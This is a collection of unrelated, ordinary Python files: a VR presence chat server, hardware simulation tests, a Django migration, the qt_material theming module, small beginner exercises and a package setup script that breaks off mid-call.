for addon_name in ADDONS_LIST.split(','):
if len(addon_name) > 0 and os.path.exists(addon_name+'.py'):
module = importlib.import_module(addon_name)
module_class = module.addon()
addons.append(module_class)
userIds = {}
queues = []
lock = threading.Lock()
client_list = []
disconnect_all = False
def log(msg, silent=False):
try:
if silent == False:
print(msg)
with open('vrpresence.log','a') as f:
f.write(str(msg, 'utf-8')+'\n')
except:
pass
# call function in each addon
# usage example:
# pass_to_addons('user_chat', userId='name', message='hello')
def pass_to_addons(function, **kwargs):
global addons
if function is not None and kwargs is not None:
for addon in addons:
if function in dir(addon):
func = getattr(addon, function)
func(**kwargs)
class AsyncServer(threading.Thread):
use_ws = False
userId = None
roomId = None
subscribed = []
message = b''
ws_queue = None
serv = None
running = True
def __init__(self, connectioninfo=None):
if connectioninfo:
socket, address = connectioninfo
self.socket = socket
self.address = address
self.use_ws = False
else:
self.use_ws = True
#self.ws_queue = queue.Queue()
threading.Thread.__init__(self, daemon=True)
#self.daemon = True
async def send(self, socket, msg, use_ws=None):
if not isinstance(msg, (bytes, bytearray)):
msg = json.dumps(msg,separators=(',', ':')).encode('utf-8')
if not use_ws and self.socket == socket:
use_ws = self.use_ws
if use_ws:
try:
msg = str(msg, 'utf-8')+'\r\n'
except:
msg = msg+'\r\n'
try:
await socket.send(msg)
except Exception as e:
log(e)
self.running = False
else:
try:
msg = bytes(msg,'utf-8')+b'\r\n'
except:
msg = msg+b'\r\n'
try:
socket.send(msg)
except OSError:
await self.disconnect()
async def recv(self, size=1048576):
if self.use_ws:
if self.socket:
try:
return (await self.socket.recv()).encode('utf-8')
except websockets.exceptions.ConnectionClosed as e:
log(e)
await self.disconnect()
else:
if self.socket:
try:
ready = select.select([self.socket], [], [], 0)[0]
except OSError as e:
return None
if len(ready) > 0:
try:
data = self.socket.recv(size)
if not data:
return None
return data
except Exception as e:
return None
else:
return b''
return None
async def setup(self, future=None, socket=None, address=None, serv=None):
self.serv = serv
if socket:
self.socket = socket
if address:
self.address = address
self.message = b''
self.running = True
lock.acquire()
if self.ws_queue:
queues.append({'socket':self.socket,'queue':self.ws_queue})
client_list.append(self)
lock.release()
log('%s:%s connected.' % self.address)
pass_to_addons('connect', thread=self)
if future:
future.set_result(True)
if not serv:
while self.running:
await self.run()
async def process(self, msg):
error = None
okay = False
user_methods = {
'move': 'user_moved',
'chat': 'user_chat',
'portal': 'user_portal',
}
method = msg.get('method',None)
data = msg.get('data',None)
if method and self.userId is None:
if method == 'logon':
userId = data.get('userId',None)
roomId = data.get('roomId',None)
if roomId is None:
error = 'Missing roomId in data packet'
if userId and userId not in userIds and len(userId) > 0:
self.userId = userId
lock.acquire()
userIds[userId] = {'socket':self, 'websocket':self.use_ws, 'queue':self.ws_queue, 'roomId':roomId, 'subscribed':[roomId,]}
lock.release()
okay = True
log(self.userId+' logged in. (%s:%s)' % self.address)
pass_to_addons('logon', userId=self.userId, thread=self)
else:
error = 'User name is already in use'
else:
error = 'You must call "logon" before sending any other commands.'
elif method and self.userId:
if method == 'move':
if data:
new_method = user_methods[method]
new_data = data.copy()
new_data['_userId'] = self.userId
pass_to_addons('user_move', data=new_data, thread=self)
await self.relay({'method':new_method, 'data':{'userId':self.userId, 'roomId':self.roomId, 'position':new_data}}, self.roomId)
else:
return False
elif method == 'enter_room':
roomId = data.get('roomId',None)
if roomId:
okay = True
pass_to_addons('user_leave', userId=self.userId, roomId=self.roomId, thread=self)
pass_to_addons('user_enter', userId=self.userId, roomId=roomId, thread=self)
await self.relay({'method':'user_leave', 'data':{'userId':self.userId,'roomId':roomId}}, self.roomId)
await self.relay({'method':'user_enter', 'data':{'userId':self.userId,'roomId':roomId}}, roomId)
self.roomId = roomId
else:
return False
elif method == 'subscribe':
roomId = data.get('roomId',None)
if roomId not in self.subscribed:
self.subscribed.append(roomId)
lock.acquire()
userIds[self.userId]['subscribed'] = self.subscribed
lock.release()
okay = True
elif method == 'unsubscribe':
roomId = data.get('roomId',None)
if roomId in self.subscribed:
self.subscribed.remove(roomId)
lock.acquire()
userIds[self.userId]['subscribed'] = self.subscribed
lock.release()
okay = True
elif method == 'chat':
if data:
pass_to_addons('user_chat', userId=self.userId, message=data, thread=self)
await self.relay({'method':'user_chat','data':{'userId':self.userId, 'message':data}},self.roomId)
else:
return False
elif method == 'portal':
url = data.get('url',None)
pos = data.get('pos',None)
fwd = data.get('fwd',None)
if url and pos and fwd:
await self.relay( {'method':'user_portal', 'data':{'roomId':self.roomId, 'userId':self.userId, 'url':url, 'pos':pos, 'fwd':fwd}}, self.roomId)
else:
return False
else:
return False
if error:
await self.send(self.socket, {'method':'error', 'data':{'message':error}})
elif okay:
await self.send(self.socket, {'method':'okay'})
return True
async def relay(self, msg, roomId=None):
if isinstance(msg, dict):
msg = json.dumps(msg,separators=(',', ':')).encode('utf-8')
if roomId is None:
lock.acquire()
ids = userIds.copy()
lock.release()
for uid in ids:
if uid != self.userId:
try:
await self.send(userIds[uid]['socket'].socket, msg, userIds[uid]['socket'].use_ws)
except Exception as e:
log(e)
else:
for uid in userIds.copy():
if uid != self.userId:
if userIds[uid].get('roomId',None) == roomId or roomId in userIds[uid].get('subscribed',[]):
try:
await self.send(userIds[uid]['socket'].socket, msg, userIds[uid]['socket'].use_ws)
except Exception as e:
log(e)
async def run(self):
global disconnect_all
if self.running:
await asyncio.sleep(0)
try:
if disconnect_all:
await self.disconnect()
data = await self.recv()
if data is not None and len(data) > 0:
self.message += data
if b'\n' not in data:
return
elif data is not None and len(data) == 0:
return
elif data is None:
await self.disconnect()
return
if not data:
await asyncio.sleep(0)
return
data = data.splitlines(keepends=True)
try:
json.loads(data[0].decode('utf-8',errors='replace'))
loaded = True
except:
loaded = False
if not loaded:
return
for line in data:
if line[-1:] != b'\n':
self.message += line
else:
self.message = b''
try:
packet = json.loads(line.decode('utf-8',errors='replace'))
except:
log(traceback.format_exc())
await self.send(self.socket, {'method':'error','data':{'message':'Unable to parse last message'}})
continue
try:
if not await self.process(packet):
await self.send(self.socket, {'method':'error','data':{'message':'Unable to parse last message'}})
except Exception:
log(line)
log(traceback.format_exc())
except KeyboardInterrupt:
disconnect_all = True
await asyncio.sleep(0)
else:
await self.disconnect()
async def disconnect(self):
global disconnect_all
global client_list
global userIds
global threads
if not self.socket:
return
if self.userId:
log(self.userId+' logged out. (%s:%s)' % self.address)
try:
pass
# may need to comment for now
#await self.relay({'method':'user_disconnected', 'data':{'userId':self.userId}}, self.roomId)
except Exception as e:
pass
else:
log('%s:%s disconnected.' % self.address)
lock.acquire(timeout=2)
self.running = False
try:
if self.use_ws:
await self.socket.close()
else:
#self.socket.shutdown(socket.SHUT_RD)
self.socket.close()
except Exception as e:
print(e)
if self.serv and self.serv in threads:
threads.remove(self.serv)
if self.userId and self.userId in userIds:
del userIds[self.userId]
if self in client_list:
client_list.remove(self)
self.socket = None
lock.release()
print(len(threads))
if USE_SSL:
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
context.load_cert_chain(certfile=CERT, keyfile=KEY)
async def ssl_connection(websocket, path):
await AsyncServer().setup(socket=websocket, address=websocket.remote_address)
@asyncio.coroutine
async def accept_connection_coro(future, loop):
global disconnect_all
global threads
asyncio.set_event_loop(loop)
if not disconnect_all:
sock = None
ready = select.select([s], [], [], 0)[0]
if len(ready) > 0:
try:
sock = s.accept()
except socket.timeout:
future.set_result(True)
return
if sock:
serv = AsyncServer(sock)
lock.acquire()
threads.append(serv)
lock.release()
await serv.setup(serv=serv)
future.set_result(True)
@asyncio.coroutine
async def loop_connections(loop):
global disconnect_all
global threads
asyncio.set_event_loop(loop)
i = 0
for this_thread in threads:
await this_thread.run()
await asyncio.sleep(0)
i += 1
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
bound = False
while bound == False:
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((DOMAIN, PORT))
bound = True
except OSError as e:
time.sleep(5)
log(e)
except KeyboardInterrupt:
disconnect_all = True
s.listen()
threads = []
if USE_SSL:
log('Presence server running on ports '+str(PORT)+' and '+str(PORT_SSL))
else:
log('Presence server running on port '+str(PORT))
loop = asyncio.new_event_loop()
if USE_SSL:
start_server = websockets.serve(ssl_connection, DOMAIN, PORT_SSL, ssl=context, subprotocols=['binary'])
loop = asyncio.get_event_loop()
try:
while not disconnect_all:
future = asyncio.Future()
asyncio.ensure_future(accept_connection_coro(future,loop))
loop.run_until_complete(future)
if USE_SSL:
loop.run_until_complete(start_server)
loop.run_until_complete(loop_connections(loop))
asyncio.sleep(0)
except KeyboardInterrupt:
disconnect_all = True
finally:
loop.close()
s.shutdown(socket.SHUT_RDWR)
s.close()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for sqrt module"""
import pytest
from sim import Simulator, CliArgs, path_join, write_memfile
import random
import sys
sys.path.append('../src/beh')
from sqrt import nrsqrt
def create_sim(cwd, simtool, gui, defines):
sim = Simulator(name=simtool, gui=gui, cwd=cwd)
sim.incdirs += ["../src/tb", "../src/rtl", cwd]
sim.sources += ["../src/rtl/sqrt.v", "../src/tb/tb_sqrt.sv"]
sim.defines += defines
sim.top = "tb_sqrt"
return sim
@pytest.fixture(params=[[], ['DIN_W=16'], ['DIN_W=18'], ['DIN_W=25'], ['DIN_W=32']])
def defines(request):
return request.param
@pytest.fixture
def simtool(pytestconfig):
return pytestconfig.getoption("sim")
def test_sv(tmpdir, defines, simtool, gui=False, pytest_run=True):
sim = create_sim(tmpdir, simtool, gui, defines)
sim.setup()
sim.run()
if pytest_run:
assert sim.is_passed
def test_py(tmpdir, defines, simtool, gui=False, pytest_run=True):
# prepare simulator
sim = create_sim(tmpdir, simtool, gui, defines)
sim.setup()
# prepare model data
try:
din_width = int(sim.get_define('DIN_W'))
except TypeError:
din_width = 32
iterations = 100
stimuli = [random.randrange(2 ** din_width) for _ in range(iterations)]
golden = [nrsqrt(d, din_width) for d in stimuli]
write_memfile(path_join(tmpdir, 'stimuli.mem'), stimuli)
write_memfile(path_join(tmpdir, 'golden.mem'), golden)
sim.defines += ['ITER_N=%d' % iterations]
sim.defines += ['PYMODEL', 'PYMODEL_STIMULI="stimuli.mem"', 'PYMODEL_GOLDEN="golden.mem"']
# run simulation
sim.run()
if pytest_run:
assert sim.is_passed
#@pytest.mark.skip(reason="Test is too slow")
def test_slow(tmpdir, defines, simtool, gui=False, pytest_run=True):
sim = create_sim(tmpdir, simtool, gui, defines)
sim.defines += ['ITER_N=500000']
sim.setup()
sim.run()
if pytest_run:
assert sim.is_passed
if __name__ == '__main__':
# run script with key -h to see help
args = CliArgs().parse()
try:
globals()[args.test](tmpdir='work',
simtool=args.simtool,
gui=args.gui,
defines=args.defines,
pytest_run=False)
except KeyError:
print("There is no test with name '%s'!" % args.test)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/12/12 3:58 下午
# @Author : zhangzhen12
# @Site :
# @File : run_rough.py
# @Software: PyCharm
import getopt
import sys
from stock_analytic_modules.rough.inc import update_records, period_records
def main(argv):
mode = None
try:
opts, args = getopt.getopt(argv, "hm:", ["mode"])
except getopt.GetoptError:
print('run_rough.py -m <mode:report/persist>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('run_rough.py -m <mode>')
sys.exit()
elif opt in ("-m", "--model"):
mode = arg
# 定时持久化
if mode == 'persist':
update_records()
# 定时发送邮箱
if mode == 'report':
period_records()
if __name__ == '__main__':
main(sys.argv[1:])
|
#!/usr/bin/python2.7
import os
from PIL import Image
DATEI_WEB_GROSSE = 700
def isimg(isitimg):
ext = os.path.splitext(isitimg)[1].lower()
if ext == ".jpg" or ext == ".png" or ext == ".gif":
return True
return False
def bearbeiten(datei):
img = Image.open(datei)
wrel = DATEI_WEB_GROSSE / float(img.size[0])
habs = int( float(img.size[1]) * float(wrel) )
splt = os.path.splitext(datei)
newfilename = splt[0] + splt[1].lower()
img = img.resize((DATEI_WEB_GROSSE, habs), Image.ANTIALIAS)
img.save(newfilename, quality=100, optimize=True, progressive=True)
if newfilename != datei:
os.rename(newfilename, datei)
def main():
files = os.listdir('.')
files = filter(isimg, files)
for f in files:
print f
bearbeiten(f)
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('feedbacks', '0002_auto_20141105_1106'),
]
operations = [
migrations.AlterModelOptions(
name='attachment',
options={'verbose_name': 'attachment', 'verbose_name_plural': 'attachments'},
),
migrations.AlterModelOptions(
name='feedback',
options={'verbose_name': 'feedback', 'verbose_name_plural': 'feedbacks'},
),
migrations.AlterModelOptions(
name='feedbacktype',
options={'verbose_name': 'feedback type', 'verbose_name_plural': 'feedback type'},
),
migrations.AddField(
model_name='feedbacktype',
name='ftype',
field=models.CharField(default='bug', max_length=10),
preserve_default=False,
),
migrations.AlterField(
model_name='attachment',
name='attachment',
field=models.FileField(upload_to=b'', verbose_name='file'),
preserve_default=True,
),
migrations.AlterField(
model_name='attachment',
name='name',
field=models.CharField(max_length=254, verbose_name='name'),
preserve_default=True,
),
migrations.AlterField(
model_name='feedback',
name='date',
field=models.DateTimeField(auto_now_add=True, verbose_name='date'),
preserve_default=True,
),
migrations.AlterField(
model_name='feedback',
name='email',
field=models.EmailField(max_length=254, verbose_name='email'),
preserve_default=True,
),
migrations.AlterField(
model_name='feedback',
name='name',
field=models.CharField(max_length=254, null=True, verbose_name='name', blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='feedback',
name='subj',
field=models.CharField(max_length=254, verbose_name='subject'),
preserve_default=True,
),
migrations.AlterField(
model_name='feedback',
name='text',
field=models.TextField(verbose_name='text'),
preserve_default=True,
),
migrations.AlterField(
model_name='feedbacktype',
name='name',
field=models.CharField(max_length=80, verbose_name='name'),
preserve_default=True,
),
]
|
import os
import sys
import logging
import base64
from pathlib import Path
import platform
from xml.dom.minidom import parse
from qt_material.resources import ResourseGenerator, RESOURCES_PATH
GUI = True
if 'PySide2' in sys.modules:
from PySide2.QtGui import QFontDatabase, QColor, QGuiApplication, QPalette
from PySide2.QtWidgets import QAction, QColorDialog
from PySide2.QtUiTools import QUiLoader
from PySide2.QtCore import Qt, QDir
elif 'PySide6' in sys.modules:
from PySide6.QtGui import QFontDatabase, QAction, QColor, QGuiApplication, QPalette
from PySide6.QtWidgets import QColorDialog
from PySide6.QtUiTools import QUiLoader
from PySide6.QtCore import Qt, QDir
elif 'PyQt5' in sys.modules:
from PyQt5.QtGui import QFontDatabase, QColor, QGuiApplication, QPalette
from PyQt5.QtWidgets import QAction, QColorDialog
from PyQt5.QtCore import Qt, QDir
from PyQt5 import uic
elif 'PyQt6' in sys.modules:
from PyQt6.QtGui import QFontDatabase, QColor, QGuiApplication, QPalette, QAction
from PyQt6.QtWidgets import QColorDialog
from PyQt6.QtCore import Qt, QDir
from PyQt6 import uic
else:
GUI = False
logging.warning("qt_material must be imported after PySide or PyQt!")
import jinja2
template = 'material.css.template'
# ----------------------------------------------------------------------
def export_theme(theme='', qss=None, rcc=None, invert_secondary=False, extra={}, output='theme', prefix='icon:/'):
""""""
if not os.path.isabs(output) and not output.startswith('.'):
output = f'.{output}'
stylesheet = build_stylesheet(
theme, invert_secondary, extra, output)
with open(qss, 'w') as file:
file.writelines(stylesheet.replace('icon:/', prefix))
if rcc:
with open(rcc, 'w') as file:
file.write('<RCC>\n')
file.write(f' <qresource prefix="{prefix[:-2]}">\n')
if output.startswith('.'):
output = output[1:]
for subfolder in ['disabled', 'primary']:
files = os.listdir(os.path.join(
os.path.abspath(output), subfolder))
files = filter(lambda s: s.endswith('svg'), files)
for filename in files:
file.write(
f' <file>{output}/{subfolder}/{filename}</file>\n')
file.write(' </qresource>\n')
file.write(f' <qresource prefix="file">\n')
if qss:
file.write(f' <file>{qss}</file>\n')
file.write(' </qresource>\n')
file.write('</RCC>\n')
# ----------------------------------------------------------------------
def build_stylesheet(theme='', invert_secondary=False, extra={}, parent='theme'):
""""""
try:
add_fonts()
except Exception as e:
logging.warning(e)
theme = get_theme(theme, invert_secondary)
if theme is None:
return None
set_icons_theme(theme, parent=parent)
loader = jinja2.FileSystemLoader(os.path.join(
os.path.dirname(os.path.abspath(__file__))))
env = jinja2.Environment(autoescape=False, loader=loader)
theme['icon'] = None
env.filters['opacity'] = opacity
env.filters['density'] = density
# env.filters['as_base64'] = as_base64
# env.filters['load'] = load
stylesheet = env.get_template(template)
theme.setdefault('font_family', 'Roboto')
theme.setdefault('danger', '#dc3545')
theme.setdefault('warning', '#ffc107')
theme.setdefault('success', '#17a2b8')
theme.setdefault('density_scale', '0')
theme.setdefault('button_shape', 'default')
theme.setdefault('font_size', '13px')
theme.update(extra)
if GUI:
default_palette = QGuiApplication.palette()
if hasattr(QPalette, 'PlaceholderText'):
default_palette.setColor(QPalette.PlaceholderText, QColor(
*[int(theme['primaryColor'][i:i + 2], 16) for i in range(1, 6, 2)] + [92]))
else:
default_palette.setColor(QPalette.ColorRole.Text, QColor(
*[int(theme['primaryColor'][i:i + 2], 16) for i in range(1, 6, 2)] + [92]))
QGuiApplication.setPalette(default_palette)
environ = {
'linux': platform.system() == 'Linux',
'windows': platform.system() == 'Windows',
'darwin': platform.system() == 'Darwin',
'pyqt5': 'PyQt5' in sys.modules,
'pyqt6': 'PyQt6' in sys.modules,
'pyside2': 'PySide2' in sys.modules,
'pyside6': 'PySide6' in sys.modules,
}
return stylesheet.render(**{**theme, **environ})
# ----------------------------------------------------------------------
def get_theme(theme_name, invert_secondary=False):
if theme_name in ['default.xml', 'default_dark.xml', 'default', 'default_dark']:
theme = os.path.join(os.path.dirname(
os.path.abspath(__file__)), 'themes', 'dark_teal.xml')
elif theme_name in ['default_light.xml', 'default_light']:
invert_secondary = True
theme = os.path.join(os.path.dirname(
os.path.abspath(__file__)), 'themes', 'light_blue.xml')
elif not os.path.exists(theme_name):
theme = os.path.join(os.path.dirname(
os.path.abspath(__file__)), 'themes', theme_name)
else:
theme = theme_name
if not os.path.exists(theme):
logging.warning(f"{theme} not exist!")
return None
document = parse(theme)
theme = {child.getAttribute(
'name'): child.firstChild.nodeValue for child in document.getElementsByTagName('color')}
for k in theme:
os.environ[str(k)] = theme[k]
if invert_secondary:
theme['secondaryColor'], theme['secondaryLightColor'], theme['secondaryDarkColor'] = theme[
'secondaryColor'], theme['secondaryDarkColor'], theme['secondaryLightColor']
for color in ['primaryColor',
'primaryLightColor',
'secondaryColor',
'secondaryLightColor',
'secondaryDarkColor',
'primaryTextColor',
'secondaryTextColor']:
os.environ[f'QTMATERIAL_{color.upper()}'] = theme[color]
os.environ['QTMATERIAL_THEME'] = theme_name
return theme
# ----------------------------------------------------------------------
def add_fonts():
""""""
fonts_path = os.path.join(os.path.dirname(__file__), 'fonts')
for font_dir in ['roboto']:
for font in filter(lambda s: s.endswith('.ttf'), os.listdir(os.path.join(fonts_path, font_dir))):
QFontDatabase.addApplicationFont(
os.path.join(fonts_path, font_dir, font))
# ----------------------------------------------------------------------
def apply_stylesheet(app, theme='', style=None, save_as=None, invert_secondary=False, extra={}, parent='theme'):
""""""
if style:
try:
app.setStyle(style)
except:
logging.error(f"The style '{style}' does not exist.")
pass
stylesheet = build_stylesheet(
theme, invert_secondary, extra, parent)
if stylesheet is None:
return
if save_as:
with open(save_as, 'w') as file:
file.writelines(stylesheet)
return app.setStyleSheet(stylesheet)
# ----------------------------------------------------------------------
def opacity(theme, value=0.5):
""""""
r, g, b = theme[1:][0:2], theme[1:][2:4], theme[1:][4:]
r, g, b = int(r, 16), int(g, 16), int(b, 16)
return f'rgba({r}, {g}, {b}, {value})'
# ----------------------------------------------------------------------
def density(value, density_scale, border=0, scale=1):
""""""
# https://material.io/develop/web/supporting/density
if isinstance(value, str) and value.startswith('@'):
return value[1:] * scale
density_interval = 4
density = (value + (density_interval * int(density_scale)) -
(border * 2)) * scale
if density < 4:
density = 4
return density
# ----------------------------------------------------------------------
def set_icons_theme(theme, parent='theme'):
""""""
source = os.path.join(os.path.dirname(__file__), 'resources', 'source')
resources = ResourseGenerator(primary=theme['primaryColor'], secondary=theme['secondaryColor'],
disabled=theme['secondaryLightColor'], source=source, parent=parent)
resources.generate()
if GUI:
QDir.addSearchPath('icon', resources.index)
QDir.addSearchPath('qt_material', os.path.join(
os.path.dirname(__file__), 'resources'))
# ----------------------------------------------------------------------
def list_themes():
""""""
themes = os.listdir(os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'themes'))
themes = filter(lambda a: a.endswith('xml'), themes)
return sorted(list(themes))
# ----------------------------------------------------------------------
def deprecated(replace):
""""""
# ----------------------------------------------------------------------
def wrap1(fn):
# ----------------------------------------------------------------------
def wrap2(*args, **kwargs):
logging.warning(
f'This function is deprecated, please use "{replace}" instead.')
fn(*args, **kwargs)
return wrap2
return wrap1
########################################################################
class QtStyleTools:
""""""
extra_values = {}
# ----------------------------------------------------------------------
@deprecated('set_extra')
def set_extra_colors(self, extra):
""""""
self.extra_values = extra
# ----------------------------------------------------------------------
def set_extra(self, extra):
""""""
self.extra_values = extra
# ----------------------------------------------------------------------
def add_menu_theme(self, parent, menu):
""""""
for theme in ['default'] + list_themes():
action = QAction(parent)
action.setText(theme)
action.triggered.connect(self._wrapper(
parent, theme, self.extra_values, self.update_buttons))
menu.addAction(action)
# ----------------------------------------------------------------------
def _wrapper(self, parent, theme, extra, callable_):
""""""
def iner():
self._apply_theme(parent, theme, extra, callable_)
return iner
# ----------------------------------------------------------------------
def _apply_theme(self, parent, theme, extra={}, callable_=None):
""""""
self.apply_stylesheet(parent, theme=theme, invert_secondary=theme.startswith(
'light'), extra=extra, callable_=callable_)
# ----------------------------------------------------------------------
def apply_stylesheet(self, parent, theme, invert_secondary=False, extra={}, callable_=None):
""""""
if theme == 'default':
parent.setStyleSheet('')
return
apply_stylesheet(parent, theme=theme,
invert_secondary=invert_secondary, extra=extra)
if callable_:
callable_()
# ----------------------------------------------------------------------
def update_buttons(self):
""""""
if not hasattr(self, 'colors'):
return
theme = {color_: os.environ[f'QTMATERIAL_{color_.upper()}']
for color_ in self.colors}
if 'light' in os.environ['QTMATERIAL_THEME']:
self.dock_theme.checkBox_ligh_theme.setChecked(True)
elif 'dark' in os.environ['QTMATERIAL_THEME']:
self.dock_theme.checkBox_ligh_theme.setChecked(False)
if self.dock_theme.checkBox_ligh_theme.isChecked():
theme['secondaryColor'], theme['secondaryLightColor'], theme['secondaryDarkColor'] = theme[
'secondaryColor'], theme['secondaryDarkColor'], theme['secondaryLightColor']
for color_ in self.colors:
button = getattr(self.dock_theme, f'pushButton_{color_}')
color = theme[color_]
if self.get_color(color).getHsv()[2] < 128:
text_color = '#ffffff'
else:
text_color = '#000000'
button.setStyleSheet(f"""
*{{
background-color: {color};
color: {text_color};
border: none;
}}""")
self.custom_colors[color_] = color
# ----------------------------------------------------------------------
def get_color(self, color):
""""""
return QColor(*[int(color[s:s + 2], 16) for s in range(1, 6, 2)])
# ----------------------------------------------------------------------
def update_theme(self, parent):
""""""
with open('my_theme.xml', 'w') as file:
file.write("""
<resources>
<color name="primaryColor">{primaryColor}</color>
<color name="primaryLightColor">{primaryLightColor}</color>
<color name="secondaryColor">{secondaryColor}</color>
<color name="secondaryLightColor">{secondaryLightColor}</color>
<color name="secondaryDarkColor">{secondaryDarkColor}</color>
<color name="primaryTextColor">{primaryTextColor}</color>
<color name="secondaryTextColor">{secondaryTextColor}</color>
</resources>
""".format(**self.custom_colors))
light = self.dock_theme.checkBox_ligh_theme.isChecked()
self.apply_stylesheet(parent, 'my_theme.xml', invert_secondary=light,
extra=self.extra_values, callable_=self.update_buttons)
# ----------------------------------------------------------------------
def set_color(self, parent, button_):
""""""
def iner():
initial = self.get_color(self.custom_colors[button_])
color_dialog = QColorDialog(parent=parent)
color_dialog.setCurrentColor(initial)
done = color_dialog.exec_()
color_ = color_dialog.currentColor()
if done and color_.isValid():
rgb_255 = [color_.red(), color_.green(), color_.blue()]
color = '#' + ''.join([hex(v)[2:].ljust(2, '0')
for v in rgb_255])
self.custom_colors[button_] = color
self.update_theme(parent)
return iner
# ----------------------------------------------------------------------
def show_dock_theme(self, parent):
""""""
self.colors = ['primaryColor',
'primaryLightColor',
'secondaryColor',
'secondaryLightColor',
'secondaryDarkColor',
'primaryTextColor',
'secondaryTextColor']
self.custom_colors = {
v: os.environ[f'QTMATERIAL_{v.upper()}'] for v in self.colors}
if 'PySide2' in sys.modules or 'PySide6' in sys.modules:
self.dock_theme = QUiLoader().load(os.path.join(
os.path.dirname(__file__), 'dock_theme.ui'))
elif 'PyQt5' in sys.modules or 'PyQt6' in sys.modules:
self.dock_theme = uic.loadUi(os.path.join(
os.path.dirname(__file__), 'dock_theme.ui'))
parent.addDockWidget(
Qt.DockWidgetArea.LeftDockWidgetArea, self.dock_theme)
self.dock_theme.setFloating(True)
self.update_buttons()
self.dock_theme.checkBox_ligh_theme.clicked.connect(
lambda: self.update_theme(self.main))
for color in self.colors:
button = getattr(self.dock_theme, f'pushButton_{color}')
button.clicked.connect(self.set_color(parent, color))
# ----------------------------------------------------------------------
def get_hook_dirs():
package_folder = Path(__file__).parent
return [str(package_folder.absolute())]
|
jogadores = []
jogador = {}
cod = 0
while True:
gols = []
total_de_gols = []
jogador['Código'] = cod
jogador['Nome'] = input('Nome do jogador: ').strip().capitalize()
partidas = int(input(f'Quantas partidas {jogador["Nome"]} jogou? '))
jogador['Partidas'] = partidas
for i in range(1, partidas + 1):
gol = int(input(f' Quantos gols na partida {i}? '))
gols.append(gol)
jogador['Gols'] = gols
jogador['Total'] = sum(gols) # Total de gols
jogadores.append(jogador.copy())
cod += 1
cont = input('Quer continuar? [S/N]: ').upper().strip()
if cont == 'N':
break
string = ''
print('=-=' * 33)
print('{:<30}{:<30}{:<30}{:<30}'.format('Código', 'Nome', 'Gols', 'Total'))
for jog in jogadores:
string += '{:<30}{:<30}{:<30}{:<30}\n'.format(str(jog['Código']), str(jog['Nome']), str(jog['Gols']), str(jog['Total']))
print(string)
print('=-=' * 33)
while True:
mostrar = int(input('Mostrar dados de qual jogador? (Digite o código) 999 para sair: '))
print('=-=' * 12)
for jogador in jogadores:
if jogador["Código"] == mostrar:
print(f'--LEVANTAMENTO DO JOGADOR {jogador["Nome"]}:')
for g in range(len(jogador['Gols'])):
print(f'No jogo {g + 1} fez {jogador["Gols"][g]} gols.')
break
else:
print(f'Não existe jogador com o código {mostrar}.')
print('=-=' * 12)
if mostrar == 999:
print('Volte sempre!')
break
|
import json
from keeper_cnab240.attribute import Attribute
class FileSection:
default_date_format = "%d%m%Y"
default_datetime_format = "%d%m%Y %H%M%S"
default_time_format = "%H%M%S"
def __init__(self, section_name, data, attributes):
self.bank = None
self.section_name = section_name
self.attributes = attributes
self.data = data
if self.data is None:
self.data = dict()
self.transform_attributes()
if self.data is not None:
self.associate_data()
def transform_attributes(self):
if self.attributes is not None:
for attr, data in self.attributes.items():
self.attributes[attr] = Attribute(attr, data['type'], data['length'], data['start'], data['end'],
data['default'], data['pad_content'], data['pad_direction'],
data['required'])
def associate_data(self):
if self.data:
if self.bank:
self.data['bank_code'] = self.bank.code
if self.attributes is not None:
for name, attr in self.attributes.items():
if name in self.data:
self.attributes[name].set_value(self.data[name])
elif attr.is_required():
raise Exception('The ' + self.section_name + ' Attribute "' + name + '" is required')
def get_dict(self):
response = dict()
if self.attributes is not None:
response = {}
for attr_name, attr in self.attributes.items():
response[attr_name] = attr.get_value()
return response
def get_json(self):
return json.dumps(self.get_dict())
def to_line(self):
if self.attributes is None:
return None
line = ''
for attr_name, attr in self.attributes.items():
line += attr.get_value()
return line
def get_required_attributes(self):
required_attributes = []
if self.attributes is None:
return required_attributes
for attr_name, attr in self.attributes.items():
if attr.is_required():
required_attributes.append(attr)
return required_attributes
def set_bank(self, bank):
self.bank = bank
def set_data(self, data=None):
if data is None:
data = dict()
for attribute, value in data.items():
self.data[attribute] = value
self.associate_data()
def set_attributes_from_line(self, line=""):
if self.attributes is not None:
for attr_name, attr in self.attributes.items():
self.attributes[attr_name].set_value(line[attr.start:attr.end])
self.attributes[attr_name].value = self.attributes[attr_name].value.strip()
|
# Conor Hogan 10/2/18
# Programming and scripting - Week 3
x = int(input("Enter number here:"))
while x != 1:
if x % 2 == 0:
x = x/2
print (x)
else:
x = (x * 3) + 1
print (x)
|
import os
import sys
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
import version
# Hack to prevent stupid "TypeError: 'NoneType' object is not callable" error
# in multiprocessing/util.py _exit_function when running `python
# setup.py test` or `python setup.py flake8`. See:
# * http://www.eby-sarna.com/pipermail/peak/2010-May/003357.html)
# * https://github.com/getsentry/raven-python/blob/master/setup.py
import multiprocessing
assert multiprocessing # silence flake8
class PyTest(TestCommand):
user_options = [('pytest-args=', 'a', 'Arguments to pass to py.test')]
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = []
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
if isinstance(self.pytest_args, str):
# pytest requires arguments as a list or tuple even if singular
self.pytest_args = [self.pytest_args]
errno = pytest.main(self.pytest_args)
sys.exit(errno)
def read(fname):
"""
Utility function to read the README file.
:rtype : String
"""
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(name='omero-user-token',
version=version.getVersion(),
description='OMERO user token management system',
long_description=read('README.md'),
long_description_content_type='text/markdown',
classifiers=[], # Get strings from
# http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='',
author='Glencoe Software, Inc.',
author_email='info@glencoesoftware.com',
url='https://github.com/glencoesoftware/omero-user-token',
license='License :: OSI Approved :: BSD License',
packages=find_packages(),
zip_safe=True,
